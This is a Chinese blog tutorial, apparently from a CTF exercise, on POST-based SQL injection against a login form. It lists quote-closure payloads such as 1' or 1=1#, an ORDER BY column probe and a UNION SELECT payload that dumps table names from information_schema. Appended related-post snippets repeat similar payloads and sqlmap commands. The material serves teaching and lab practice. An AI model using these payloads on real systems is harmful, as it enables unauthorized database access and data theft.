一篇文章带你搞定SQL注入里的POST注入

POST注入攻击手段与SQL判断技巧
原创 已于 2024-01-26 12:08:32 修改 · 850 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库

于 2023-12-10 11:51:30 首次发布
本文详细讲解了POST注入攻击中的闭合方式判断、字段数探测,以及针对union联合注入的示例,包括如何利用SQL盲注获取数据库信息和表结构数据。

这里以这道题目为例子,看界面就知道这是一道典型的POST注入

这里无论怎么输入后都没有报错信息,

1.闭合方式的判断(直接上万能密码,一个个复制粘贴就好了,哪个能登录进去,哪个就是闭合方式)

1 or 1=1#             1) or 1=1#            1)) or 1=1#

1' or 1=1#            1') or 1=1#           1') or 1=1#

1" or 1=1#           1") or 1=1#          1") or 1=1#  

如果显示

那么单引号就是闭合方式

2.判断字段数

1’ or 1=1 order by 2#

不断改变数字,就可以找到

3.接下来看你做的题目的具体情况使用盲注或者时union 联合注入

举例:如果是union联合注入,就直接先爆库名,

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

接下来爆破表名,字段名,和字段内容,和GETunion联合注入方式类似,这里就不过多阐述。

只是一开始都是以1’开头罢了

POST注入
笔墨稠思
11-06 788
靶场地址 POST注入和GET注入几乎没有区别,只是GET注入在url上传参,而POST注入在FORM表单中传递参数。 首先,我们需要判断FORM表单是否存在sql注入: 这是一个登录表单,我采取了通用的登录方式 a’ or 1=1 发现登录成功,说明存在SQL注入 接下来我需要获取当前表的字段数来进行联合查询 用 order by 方法获取了当前表中有3个字段,之后判断回显点 通过联合查询 union select 1,2,3 发现会先点为2,3两字段位置,接下来就可以查询我们想要的内容了 查
从一个Laravel SQL注入漏洞开始的Bug Bounty之旅
离别歌
08-30 2921
事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程。本文提到的漏洞《Cachet SQL注入漏洞(CVE-2021-39165)》已经修复,也请读者勿使用该...
mysql post 注入工具_Sqlmap POST注入 三种方法(转载)
weixin_39778582的博客
01-19 1243
不管怎么说?使用工具Sqlmap POST注入都会简单很多,具体说说Sqlmap POST注入 三种方法吧!一、自动填写表单自动填写表单是Sqlmap工具POST注入的第一种方法,具体步骤如下:1、判断是否有post注入?root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms出来的提示,一路回车就可以了!结果如下图:从这,可以得...
post注入
quan9i的博客
01-04 5839
post注入sql-lab11-18)
SQL注入专题
巅峰测试
08-03 1889
     SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别, 所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。    随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码
【项目实践】一文搞定页面权限、按钮权限以及数据权限
RudeCrab的博客
11-09 2790
各个维度的权限统统搞定
SQL Injection4(sqlmap)
kid的博客
04-12 486
SQL Injection4(sqlmap) 前言 前面把手工注入算是简单的练习了一遍,这来学习下sqlmap,感受下工具的强大。主要也是针对dvwa的sql注入和盲注用sqlmap再来一遍,然后试下文件的上传下载等功能。算是对sqlmap的一个入门吧。 参数 sqlmap的参数真的很多,下面这篇博客把所有sqlmap -hh的参数都进行了中文翻译,挺方便后面查阅的 超详细SQLMap使用攻略及...
SpringBoot 就这一篇搞定
十年代码写十年
12-22 642
一、Hello Spring Boot 1、Spring Boot 简介 简化Spring应用开发的一个框架; 整个Spring技术栈的一个大整合; J2EE开发的一站式解决方案; 2、微服务 微服务:架构风格(服务微化) 一个应用应该是一组小型服务;可以通过HTTP的方式进行互通; 单体应用:ALL IN ONE 微服务:每一个功能元素最终都是一个可独立替换和独立升级的软件单元;...
sqlmap使用教程(包含POST注入方式)
最新发布
weixin_73904941的博客
10-25 1万+
检测注入点以及可注入类型 sqlmap -u "网址" --batch -–batch(不再询问,默认执行) 查看所有数据库 --dbs sqlmap -u "网址" --batch --dbs 查看当前使用的数据库 --current-db sqlmap -u "网址" --batch --current-db 查看表名 sqlmap -u "网址" -D security --tables --batch -D 指定数据库 --tables 列举所有表名 ....
SQL注入 - POST注入方法
HAKUNAMATATATTA的博客
08-30 1436
SQL注入-POST注入方法教学
(手工)【sqli-labs11-12】POST注入:基本步骤、示例
07-07 1669
SQL-POST注入
SQL-Post注入
Code-5的博客
04-17 674
在登录过程中,输入用户名和密码,用户名和密码以表单的形式提交,提交到服务器后服务器再进行验证。这就是一次post的过程的。在输入正确的用户名和密码后显示尝试会不会回显报错信息,输入admin'--+,回显报错了。尝试万能密码 admin’or’1’='1# ,成功登录并且回显信息。尝试联合注入显示数据库名了。
手把手教你挖POST注入
weixin_45733372的博客
05-01 615
POST注入高危点:登录框、查询框、等各种和数据库有交互的框 1、判断是否存在sql注入先用万能密码登陆试试看 ' or 1=1 -- qwe 2、登陆成功证明存在sql注入,下面在判断字段数 ' or 1=1 order by 3 -- qwe 1到3返回正常 4返回错误 3、 现在在判断回显点 ' and 1=1 union select 1,2,3 -- qwe 回显点是2,3 4、查询当前数据库名 ' and 1=1 un...
SQL注入post注入
banliyaoguai的博客
05-21 1608
GET请求的参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求的参数传输长度是被限制的。GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
SQL注入---POST注入
zhoutong2323的博客
04-07 1840
在Webshell文章中介绍过post提交和get提交的区别,这不再赘述get方式提交URL中的参数信息,post方式则是将信息保存在HTTP请求的body中传递get提交的参数可以被缓存并会保留在浏览器的历史记录post提交不会。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
POST_sql注入
D_Dwjh的博客
08-10 1117
POST注入,主要特征是有提交的表单!!! 因为GET和POST最大的区别是,一个参数是在url面显示,另一个是在body中显示。 所以在弄POST注入的时候,是通过提交表单来实现的!!! 其实POST注入也是那5个规则: 1.首先找到注入点 2.探测页面字段数 3.探测输出点 4.探测数据库名和表名 5.获取字段值 开始~ 靶场POST_rank1练手: 首先打开靶场,先看一下查询语句,发现有2个参数,一个是“username”,另一个是“password”。 看了一下,思考……感觉可以通过闭合引号+
POST注入/HEAD注入
qq_58000413的博客
09-14 539
python sqlmap.py -u 目标url -delay=1 --level 3 --risk 2 -batch。python sqlmap.py -r 绝对路径 -delay=1 --level 3 --risk 2 -batch。select updataxml("a",concat("~", () ),"b") 这需要拼接特殊字符串才可以报错。updatexml("a",绝对路径,"b") 更新xml文件内容。
手把手教你搭建ASP+ACCESS SQL注入环境
SQL注入SQL Injection)是一种注入攻击,攻击者通过在应用程序的输入字段中插入恶意SQL代码,利用应用程序执行不安全的SQL查询,从而获得未授权的数据库访问,影响数据库数据的完整性和保密性。 描述中提到的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值